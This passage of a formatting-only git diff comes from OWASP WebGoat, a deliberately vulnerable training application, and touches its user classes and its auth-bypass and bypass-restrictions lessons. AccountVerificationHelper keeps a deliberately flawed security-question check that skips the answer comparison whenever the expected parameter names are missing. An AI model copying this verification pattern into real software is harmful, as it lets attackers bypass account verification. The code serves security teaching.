diff --git a/src/main/java/org/owasp/webgoat/container/users/UserSession.java b/src/main/java/org/owasp/webgoat/container/users/UserSession.java
index f742fd02e..5bf29a7f0 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserSession.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserSession.java
@@ -15,7 +15,6 @@ import org.springframework.data.annotation.Id;
 @NoArgsConstructor(access = AccessLevel.PROTECTED)
 public class UserSession {
 
-    private WebGoatUser webGoatUser;
-    @Id
-    private String sessionId;
+  private WebGoatUser webGoatUser;
+  @Id private String sessionId;
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/UserTracker.java b/src/main/java/org/owasp/webgoat/container/users/UserTracker.java
index 0850f0eac..86bdf4c14 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserTracker.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserTracker.java
@@ -1,43 +1,41 @@
-
 package org.owasp.webgoat.container.users;
 
-import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.container.lessons.Lesson;
-import org.owasp.webgoat.container.lessons.Assignment;
-
-import javax.persistence.*;
 import java.util.HashSet;
 import java.util.Map;
 import java.util.Optional;
 import java.util.Set;
 import java.util.stream.Collectors;
-
+import javax.persistence.*;
+import lombok.extern.slf4j.Slf4j;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
 
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @version $Id: $Id
@@ -47,80 +45,83 @@ import java.util.stream.Collectors;
 @Entity
 public class UserTracker {
 
-    @Id
-    @GeneratedValue(strategy = GenerationType.AUTO)
-    private Long id;
-    @Column(name = "username")
-    private String user;
-    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private Set<LessonTracker> lessonTrackers = new HashSet<>();
+  @Id
+  @GeneratedValue(strategy = GenerationType.AUTO)
+  private Long id;
 
-    private UserTracker() {}
+  @Column(name = "username")
+  private String user;
 
-    public UserTracker(final String user) {
-        this.user = user;
+  @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
+  private Set<LessonTracker> lessonTrackers = new HashSet<>();
+
+  private UserTracker() {}
+
+  public UserTracker(final String user) {
+    this.user = user;
+  }
+
+  /**
+   * Returns an existing lesson tracker or create a new one based on the lesson
+   *
+   * @param lesson the lesson
+   * @return a lesson tracker created if not already present
+   */
+  public LessonTracker getLessonTracker(Lesson lesson) {
+    Optional<LessonTracker> lessonTracker =
+        lessonTrackers.stream().filter(l -> l.getLessonName().equals(lesson.getId())).findFirst();
+    if (!lessonTracker.isPresent()) {
+      LessonTracker newLessonTracker = new LessonTracker(lesson);
+      lessonTrackers.add(newLessonTracker);
+      return newLessonTracker;
+    } else {
+      return lessonTracker.get();
     }
+  }
 
-    /**
-     * Returns an existing lesson tracker or create a new one based on the lesson
-     *
-     * @param lesson the lesson
-     * @return a lesson tracker created if not already present
-     */
-    public LessonTracker getLessonTracker(Lesson lesson) {
-        Optional<LessonTracker> lessonTracker = lessonTrackers
-                .stream().filter(l -> l.getLessonName().equals(lesson.getId())).findFirst();
-        if (!lessonTracker.isPresent()) {
-            LessonTracker newLessonTracker = new LessonTracker(lesson);
-            lessonTrackers.add(newLessonTracker);
-            return newLessonTracker;
-        } else {
-            return lessonTracker.get();
-        }
-    }
+  /**
+   * Query method for finding a specific lesson tracker based on id
+   *
+   * @param id the id of the lesson
+   * @return optional due to the fact we can only create a lesson tracker based on a lesson
+   */
+  public Optional<LessonTracker> getLessonTracker(String id) {
+    return lessonTrackers.stream().filter(l -> l.getLessonName().equals(id)).findFirst();
+  }
 
-    /**
-     * Query method for finding a specific lesson tracker based on id
-     *
-     * @param id the id of the lesson
-     * @return optional due to the fact we can only create a lesson tracker based on a lesson
-     */
-    public Optional<LessonTracker> getLessonTracker(String id) {
-        return lessonTrackers.stream().filter(l -> l.getLessonName().equals(id)).findFirst();
-    }
+  public void assignmentSolved(Lesson lesson, String assignmentName) {
+    LessonTracker lessonTracker = getLessonTracker(lesson);
+    lessonTracker.incrementAttempts();
+    lessonTracker.assignmentSolved(assignmentName);
+  }
 
-    public void assignmentSolved(Lesson lesson, String assignmentName) {
-        LessonTracker lessonTracker = getLessonTracker(lesson);
-        lessonTracker.incrementAttempts();
-        lessonTracker.assignmentSolved(assignmentName);
-    }
+  public void assignmentFailed(Lesson lesson) {
+    LessonTracker lessonTracker = getLessonTracker(lesson);
+    lessonTracker.incrementAttempts();
+  }
 
-    public void assignmentFailed(Lesson lesson) {
-        LessonTracker lessonTracker = getLessonTracker(lesson);
-        lessonTracker.incrementAttempts();
-    }
+  public void reset(Lesson al) {
+    LessonTracker lessonTracker = getLessonTracker(al);
+    lessonTracker.reset();
+  }
 
-    public void reset(Lesson al) {
-        LessonTracker lessonTracker = getLessonTracker(al);
-        lessonTracker.reset();
+  public int numberOfLessonsSolved() {
+    int numberOfLessonsSolved = 0;
+    for (LessonTracker lessonTracker : lessonTrackers) {
+      if (lessonTracker.isLessonSolved()) {
+        numberOfLessonsSolved = numberOfLessonsSolved + 1;
+      }
     }
+    return numberOfLessonsSolved;
+  }
 
-    public int numberOfLessonsSolved() {
-        int numberOfLessonsSolved = 0;
-        for (LessonTracker lessonTracker : lessonTrackers) {
-            if (lessonTracker.isLessonSolved()) {
-                numberOfLessonsSolved = numberOfLessonsSolved + 1;
-            }
-        }
-        return numberOfLessonsSolved;
-    }
-
-    public int numberOfAssignmentsSolved() {
-        int numberOfAssignmentsSolved = 0;
-        for (LessonTracker lessonTracker : lessonTrackers) {
-            Map<Assignment, Boolean> lessonOverview = lessonTracker.getLessonOverview();
-            numberOfAssignmentsSolved = lessonOverview.values().stream().filter(b -> b).collect(Collectors.counting()).intValue();
-        }
-        return numberOfAssignmentsSolved;
+  public int numberOfAssignmentsSolved() {
+    int numberOfAssignmentsSolved = 0;
+    for (LessonTracker lessonTracker : lessonTrackers) {
+      Map<Assignment, Boolean> lessonOverview = lessonTracker.getLessonOverview();
+      numberOfAssignmentsSolved =
+          lessonOverview.values().stream().filter(b -> b).collect(Collectors.counting()).intValue();
     }
+    return numberOfAssignmentsSolved;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java b/src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java
index c80db503c..154360c3e 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java
@@ -8,6 +8,5 @@ import org.springframework.data.jpa.repository.JpaRepository;
  */
 public interface UserTrackerRepository extends JpaRepository<UserTracker, String> {
 
-    UserTracker findByUser(String user);
-
+  UserTracker findByUser(String user);
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/UserValidator.java b/src/main/java/org/owasp/webgoat/container/users/UserValidator.java
index fc1d6691a..6301e08b3 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserValidator.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserValidator.java
@@ -13,23 +13,23 @@ import org.springframework.validation.Validator;
 @AllArgsConstructor
 public class UserValidator implements Validator {
 
-    private final UserRepository userRepository;
+  private final UserRepository userRepository;
 
-    @Override
-    public boolean supports(Class<?> clazz) {
-        return UserForm.class.equals(clazz);
+  @Override
+  public boolean supports(Class<?> clazz) {
+    return UserForm.class.equals(clazz);
+  }
+
+  @Override
+  public void validate(Object o, Errors errors) {
+    UserForm userForm = (UserForm) o;
+
+    if (userRepository.findByUsername(userForm.getUsername()) != null) {
+      errors.rejectValue("username", "username.duplicate");
     }
 
-    @Override
-    public void validate(Object o, Errors errors) {
-        UserForm userForm = (UserForm) o;
-
-        if (userRepository.findByUsername(userForm.getUsername()) != null) {
-            errors.rejectValue("username", "username.duplicate");
-        }
-
-        if (!userForm.getMatchingPassword().equals(userForm.getPassword())) {
-            errors.rejectValue("matchingPassword", "password.diff");
-        }
+    if (!userForm.getMatchingPassword().equals(userForm.getPassword())) {
+      errors.rejectValue("matchingPassword", "password.diff");
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java b/src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java
index f64462348..517e50a60 100644
--- a/src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java
+++ b/src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java
@@ -1,17 +1,16 @@
 package org.owasp.webgoat.container.users;
 
+import java.util.Collection;
+import java.util.Collections;
+import javax.persistence.Entity;
+import javax.persistence.Id;
+import javax.persistence.Transient;
 import lombok.Getter;
 import org.springframework.security.core.GrantedAuthority;
 import org.springframework.security.core.authority.SimpleGrantedAuthority;
 import org.springframework.security.core.userdetails.User;
 import org.springframework.security.core.userdetails.UserDetails;
 
-import javax.persistence.Entity;
-import javax.persistence.Id;
-import javax.persistence.Transient;
-import java.util.Collection;
-import java.util.Collections;
-
 /**
  * @author nbaars
  * @since 3/19/17.
@@ -20,79 +19,72 @@ import java.util.Collections;
 @Entity
 public class WebGoatUser implements UserDetails {
 
-    public static final String ROLE_USER = "WEBGOAT_USER";
-    public static final String ROLE_ADMIN = "WEBGOAT_ADMIN";
+  public static final String ROLE_USER = "WEBGOAT_USER";
+  public static final String ROLE_ADMIN = "WEBGOAT_ADMIN";
 
-    @Id
-    private String username;
-    private String password;
-    private String role = ROLE_USER;
-    @Transient
-    private User user;
+  @Id private String username;
+  private String password;
+  private String role = ROLE_USER;
+  @Transient private User user;
 
-    protected WebGoatUser() {
-    }
+  protected WebGoatUser() {}
 
-    public WebGoatUser(String username, String password) {
-        this(username, password, ROLE_USER);
-    }
+  public WebGoatUser(String username, String password) {
+    this(username, password, ROLE_USER);
+  }
 
-    public WebGoatUser(String username, String password, String role) {
-        this.username = username;
-        this.password = password;
-        this.role = role;
-        createUser();
-    }
+  public WebGoatUser(String username, String password, String role) {
+    this.username = username;
+    this.password = password;
+    this.role = role;
+    createUser();
+  }
 
+  public void createUser() {
+    this.user = new User(username, password, getAuthorities());
+  }
 
-    public void createUser() {
-        this.user = new User(username, password, getAuthorities());
-    }
+  public Collection<? extends GrantedAuthority> getAuthorities() {
+    return Collections.singleton(new SimpleGrantedAuthority(getRole()));
+  }
 
-    public Collection<? extends GrantedAuthority> getAuthorities() {
-        return Collections.singleton(new SimpleGrantedAuthority(getRole()));
-    }
+  public String getRole() {
+    return this.role;
+  }
 
-    public String getRole() {
-        return this.role;
-    }
+  public String getUsername() {
+    return this.username;
+  }
 
-    public String getUsername() {
-        return this.username;
-    }
+  public String getPassword() {
+    return this.password;
+  }
 
-    public String getPassword() {
-        return this.password;
-    }
+  @Override
+  public boolean isAccountNonExpired() {
+    return this.user.isAccountNonExpired();
+  }
 
-    @Override
-    public boolean isAccountNonExpired() {
-        return this.user.isAccountNonExpired();
-    }
+  @Override
+  public boolean isAccountNonLocked() {
+    return this.user.isAccountNonLocked();
+  }
 
-    @Override
-    public boolean isAccountNonLocked() {
-        return this.user.isAccountNonLocked();
-    }
+  @Override
+  public boolean isCredentialsNonExpired() {
+    return this.user.isCredentialsNonExpired();
+  }
 
-    @Override
-    public boolean isCredentialsNonExpired() {
-        return this.user.isCredentialsNonExpired();
-    }
+  @Override
+  public boolean isEnabled() {
+    return this.user.isEnabled();
+  }
 
-    @Override
-    public boolean isEnabled() {
-        return this.user.isEnabled();
-    }
-
-    public boolean equals(Object obj) {
-        return obj instanceof WebGoatUser webGoatUser && this.user.equals(webGoatUser.user);
-    }
-
-    public int hashCode() {
-        return user.hashCode();
-    }
+  public boolean equals(Object obj) {
+    return obj instanceof WebGoatUser webGoatUser && this.user.equals(webGoatUser.user);
+  }
 
+  public int hashCode() {
+    return user.hashCode();
+  }
 }
-
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java b/src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java
index bf11d0ce6..41b64d518 100644
--- a/src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java
+++ b/src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java
@@ -25,63 +25,72 @@ package org.owasp.webgoat.lessons.authbypass;
 import java.util.HashMap;
 import java.util.Map;
 
-/**
- * Created by appsec on 7/18/17.
- */
+/** Created by appsec on 7/18/17. */
 public class AccountVerificationHelper {
 
-    //simulating database storage of verification credentials
-    private static final Integer verifyUserId = 1223445;
-    private static final Map<String, String> userSecQuestions = new HashMap<>();
+  // simulating database storage of verification credentials
+  private static final Integer verifyUserId = 1223445;
+  private static final Map<String, String> userSecQuestions = new HashMap<>();
 
-    static {
-        userSecQuestions.put("secQuestion0", "Dr. Watson");
-        userSecQuestions.put("secQuestion1", "Baker Street");
+  static {
+    userSecQuestions.put("secQuestion0", "Dr. Watson");
+    userSecQuestions.put("secQuestion1", "Baker Street");
+  }
+
+  private static final Map<Integer, Map> secQuestionStore = new HashMap<>();
+
+  static {
+    secQuestionStore.put(verifyUserId, userSecQuestions);
+  }
+  // end 'data store set up'
+
+  // this is to aid feedback in the attack process and is not intended to be part of the
+  // 'vulnerable' code
+  public boolean didUserLikelylCheat(HashMap<String, String> submittedAnswers) {
+    boolean likely = false;
+
+    if (submittedAnswers.size() == secQuestionStore.get(verifyUserId).size()) {
+      likely = true;
     }
 
-    private static final Map<Integer, Map> secQuestionStore = new HashMap<>();
-
-    static {
-        secQuestionStore.put(verifyUserId, userSecQuestions);
+    if ((submittedAnswers.containsKey("secQuestion0")
+            && submittedAnswers
+                .get("secQuestion0")
+                .equals(secQuestionStore.get(verifyUserId).get("secQuestion0")))
+        && (submittedAnswers.containsKey("secQuestion1")
+            && submittedAnswers
+                .get("secQuestion1")
+                .equals(secQuestionStore.get(verifyUserId).get("secQuestion1")))) {
+      likely = true;
+    } else {
+      likely = false;
     }
-    // end 'data store set up'
 
-    // this is to aid feedback in the attack process and is not intended to be part of the 'vulnerable' code
-    public boolean didUserLikelylCheat(HashMap<String, String> submittedAnswers) {
-        boolean likely = false;
-
-        if (submittedAnswers.size() == secQuestionStore.get(verifyUserId).size()) {
-            likely = true;
-        }
-
-        if ((submittedAnswers.containsKey("secQuestion0") && submittedAnswers.get("secQuestion0").equals(secQuestionStore.get(verifyUserId).get("secQuestion0")))
-                && (submittedAnswers.containsKey("secQuestion1") && submittedAnswers.get("secQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1")))) {
-            likely = true;
-        } else {
-            likely = false;
-        }
-
-        return likely;
+    return likely;
+  }
+  // end of cheating check ... the method below is the one of real interest. Can you find the flaw?
 
+  public boolean verifyAccount(Integer userId, HashMap<String, String> submittedQuestions) {
+    // short circuit if no questions are submitted
+    if (submittedQuestions.entrySet().size() != secQuestionStore.get(verifyUserId).size()) {
+      return false;
     }
-    //end of cheating check ... the method below is the one of real interest. Can you find the flaw?
-
-    public boolean verifyAccount(Integer userId, HashMap<String, String> submittedQuestions) {
-        //short circuit if no questions are submitted
-        if (submittedQuestions.entrySet().size() != secQuestionStore.get(verifyUserId).size()) {
-            return false;
-        }
-
-        if (submittedQuestions.containsKey("secQuestion0") && !submittedQuestions.get("secQuestion0").equals(secQuestionStore.get(verifyUserId).get("secQuestion0"))) {
-            return false;
-        }
-
-        if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("secQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) {
-            return false;
-        }
-
-        // else
-        return true;
 
+    if (submittedQuestions.containsKey("secQuestion0")
+        && !submittedQuestions
+            .get("secQuestion0")
+            .equals(secQuestionStore.get(verifyUserId).get("secQuestion0"))) {
+      return false;
     }
+
+    if (submittedQuestions.containsKey("secQuestion1")
+        && !submittedQuestions
+            .get("secQuestion1")
+            .equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) {
+      return false;
+    }
+
+    // else
+    return true;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java b/src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java
index cb01d5a01..8680b47d7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java
+++ b/src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java
@@ -29,13 +29,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class AuthBypass extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A7;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A7;
+  }
 
-    @Override
-    public String getTitle() {
-        return "auth-bypass.title";
-    }
+  @Override
+  public String getTitle() {
+    return "auth-bypass.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java b/src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java
index 2ca6ee5f0..ed7988b13 100644
--- a/src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java
+++ b/src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java
@@ -22,6 +22,13 @@
 
 package org.owasp.webgoat.lessons.authbypass;
 
+import java.io.IOException;
+import java.util.Collections;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -33,63 +40,54 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.ServletException;
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-import java.util.Collections;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
-/**
- * Created by jason on 1/5/17.
- */
+/** Created by jason on 1/5/17. */
 @RestController
-@AssignmentHints({"auth-bypass.hints.verify.1", "auth-bypass.hints.verify.2", "auth-bypass.hints.verify.3", "auth-bypass.hints.verify.4"})
+@AssignmentHints({
+  "auth-bypass.hints.verify.1",
+  "auth-bypass.hints.verify.2",
+  "auth-bypass.hints.verify.3",
+  "auth-bypass.hints.verify.4"
+})
 public class VerifyAccount extends AssignmentEndpoint {
 
-    @Autowired
-    private WebSession webSession;
+  @Autowired private WebSession webSession;
 
-    @Autowired
-    UserSessionData userSessionData;
-
-    @PostMapping(path = "/auth-bypass/verify-account", produces = {"application/json"})
-    @ResponseBody
-    public AttackResult completed(@RequestParam String userId, @RequestParam String verifyMethod, HttpServletRequest req) throws ServletException, IOException {
-        AccountVerificationHelper verificationHelper = new AccountVerificationHelper();
-        Map<String, String> submittedAnswers = parseSecQuestions(req);
-        if (verificationHelper.didUserLikelylCheat((HashMap) submittedAnswers)) {
-            return failed(this)
-                    .feedback("verify-account.cheated")
-                    .output("Yes, you guessed correctly, but see the feedback message")
-                    .build();
-        }
-
-        // else
-        if (verificationHelper.verifyAccount(Integer.valueOf(userId), (HashMap) submittedAnswers)) {
-            userSessionData.setValue("account-verified-id", userId);
-            return success(this)
-                    .feedback("verify-account.success")
-                    .build();
-        } else {
-            return failed(this)
-                    .feedback("verify-account.failed")
-                    .build();
-        }
+  @Autowired UserSessionData userSessionData;
 
+  @PostMapping(
+      path = "/auth-bypass/verify-account",
+      produces = {"application/json"})
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String userId, @RequestParam String verifyMethod, HttpServletRequest req)
+      throws ServletException, IOException {
+    AccountVerificationHelper verificationHelper = new AccountVerificationHelper();
+    Map<String, String> submittedAnswers = parseSecQuestions(req);
+    if (verificationHelper.didUserLikelylCheat((HashMap) submittedAnswers)) {
+      return failed(this)
+          .feedback("verify-account.cheated")
+          .output("Yes, you guessed correctly, but see the feedback message")
+          .build();
     }
 
-    private HashMap<String, String> parseSecQuestions(HttpServletRequest req) {
-        Map<String, String> userAnswers = new HashMap<>();
-        List<String> paramNames = Collections.list(req.getParameterNames());
-        for (String paramName : paramNames) {
-            //String paramName = req.getParameterNames().nextElement();
-            if (paramName.contains("secQuestion")) {
-                userAnswers.put(paramName, req.getParameter(paramName));
-            }
-        }
-        return (HashMap) userAnswers;
+    // else
+    if (verificationHelper.verifyAccount(Integer.valueOf(userId), (HashMap) submittedAnswers)) {
+      userSessionData.setValue("account-verified-id", userId);
+      return success(this).feedback("verify-account.success").build();
+    } else {
+      return failed(this).feedback("verify-account.failed").build();
     }
+  }
 
+  private HashMap<String, String> parseSecQuestions(HttpServletRequest req) {
+    Map<String, String> userAnswers = new HashMap<>();
+    List<String> paramNames = Collections.list(req.getParameterNames());
+    for (String paramName : paramNames) {
+      // String paramName = req.getParameterNames().nextElement();
+      if (paramName.contains("secQuestion")) {
+        userAnswers.put(paramName, req.getParameter(paramName));
+      }
+    }
+    return (HashMap) userAnswers;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java
index 0b6d259b9..7aaa06c5c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class BypassRestrictions extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CLIENT_SIDE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CLIENT_SIDE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "bypass-restrictions.title";
-    }
+  @Override
+  public String getTitle() {
+    return "bypass-restrictions.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java
index 6deeb3eca..2ea8db965 100644
--- a/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java
@@ -32,24 +32,29 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class BypassRestrictionsFieldRestrictions extends AssignmentEndpoint {
 
-    @PostMapping("/BypassRestrictions/FieldRestrictions")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String select, @RequestParam String radio, @RequestParam String checkbox, @RequestParam String shortInput, @RequestParam String readOnlyInput) {
-        if (select.equals("option1") || select.equals("option2")) {
-            return failed(this).build();
-        }
-        if (radio.equals("option1") || radio.equals("option2")) {
-            return failed(this).build();
-        }
-        if (checkbox.equals("on") || checkbox.equals("off")) {
-            return failed(this).build();
-        }
-        if (shortInput.length() <= 5) {
-            return failed(this).build();
-        }
-        if ("change".equals(readOnlyInput)) {
-            return failed(this).build();
-        }
-        return success(this).build();
+  @PostMapping("/BypassRestrictions/FieldRestrictions")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String select,
+      @RequestParam String radio,
+      @RequestParam String checkbox,
+      @RequestParam String shortInput,
+      @RequestParam String readOnlyInput) {
+    if (select.equals("option1") || select.equals("option2")) {
+      return failed(this).build();
     }
+    if (radio.equals("option1") || radio.equals("option2")) {
+      return failed(this).build();
+    }
+    if (checkbox.equals("on") || checkbox.equals("off")) {
+      return failed(this).build();
+    }
+    if (shortInput.length() <= 5) {
+      return failed(this).build();
+    }
+    if ("change".equals(readOnlyInput)) {
+      return failed(this).build();
+    }
+    return success(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java
index f4bfd2230..9d2c048eb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java
@@ -32,40 +32,48 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class BypassRestrictionsFrontendValidation extends AssignmentEndpoint {
 
-    @PostMapping("/BypassRestrictions/frontendValidation")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String field1, @RequestParam String field2, @RequestParam String field3, @RequestParam String field4, @RequestParam String field5, @RequestParam String field6, @RequestParam String field7, @RequestParam Integer error) {
-        final String regex1 = "^[a-z]{3}$";
-        final String regex2 = "^[0-9]{3}$";
-        final String regex3 = "^[a-zA-Z0-9 ]*$";
-        final String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";
-        final String regex5 = "^\\d{5}$";
-        final String regex6 = "^\\d{5}(-\\d{4})?$";
-        final String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";
-        if (error > 0) {
-            return failed(this).build();
-        }
-        if (field1.matches(regex1)) {
-            return failed(this).build();
-        }
-        if (field2.matches(regex2)) {
-            return failed(this).build();
-        }
-        if (field3.matches(regex3)) {
-            return failed(this).build();
-        }
-        if (field4.matches(regex4)) {
-            return failed(this).build();
-        }
-        if (field5.matches(regex5)) {
-            return failed(this).build();
-        }
-        if (field6.matches(regex6)) {
-            return failed(this).build();
-        }
-        if (field7.matches(regex7)) {
-            return failed(this).build();
-        }
-        return success(this).build();
+  @PostMapping("/BypassRestrictions/frontendValidation")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String field1,
+      @RequestParam String field2,
+      @RequestParam String field3,
+      @RequestParam String field4,
+      @RequestParam String field5,
+      @RequestParam String field6,
+      @RequestParam String field7,
+      @RequestParam Integer error) {
+    final String regex1 = "^[a-z]{3}$";
+    final String regex2 = "^[0-9]{3}$";
+    final String regex3 = "^[a-zA-Z0-9 ]*$";
+    final String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";
+    final String regex5 = "^\\d{5}$";
+    final String regex6 = "^\\d{5}(-\\d{4})?$";
+    final String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";
+    if (error > 0) {
+      return failed(this).build();
     }
+    if (field1.matches(regex1)) {
+      return failed(this).build();
+    }
+    if (field2.matches(regex2)) {
+      return failed(this).build();
+    }
+    if (field3.matches(regex3)) {
+      return failed(this).build();
+    }
+    if (field4.matches(regex4)) {
+      return failed(this).build();
+    }
+    if (field5.matches(regex5)) {
+      return failed(this).build();
+    }
+    if (field6.matches(regex6)) {
+      return failed(this).build();
+    }
+    if (field7.matches(regex7)) {
+      return failed(this).build();
+    }
+    return success(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java b/src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java
index c3e1b1c8e..1c6ba4c37 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java
@@ -9,13 +9,13 @@ import org.owasp.webgoat.container.lessons.Lesson;
  */
 public class ChallengeIntro extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CHALLENGE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CHALLENGE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "challenge0.title";
-    }
+  @Override
+  public String getTitle() {
+    return "challenge0.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/Email.java b/src/main/java/org/owasp/webgoat/lessons/challenges/Email.java
index fe1eb40b2..81e105a9a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/challenges/Email.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/Email.java
@@ -22,11 +22,10 @@
 
 package org.owasp.webgoat.lessons.challenges;
 
-import lombok.Builder;
-import lombok.Data;
-
 import java.io.Serializable;
 import java.time.LocalDateTime;
+import lombok.Builder;
+import lombok.Data;
 
 /**
  * @author nbaars
@@ -36,9 +35,9 @@ import java.time.LocalDateTime;
 @Data
 public class Email implements Serializable {
 
-    private LocalDateTime time;
-    private String contents;
-    private String sender;
-    private String title;
-    private String recipient;
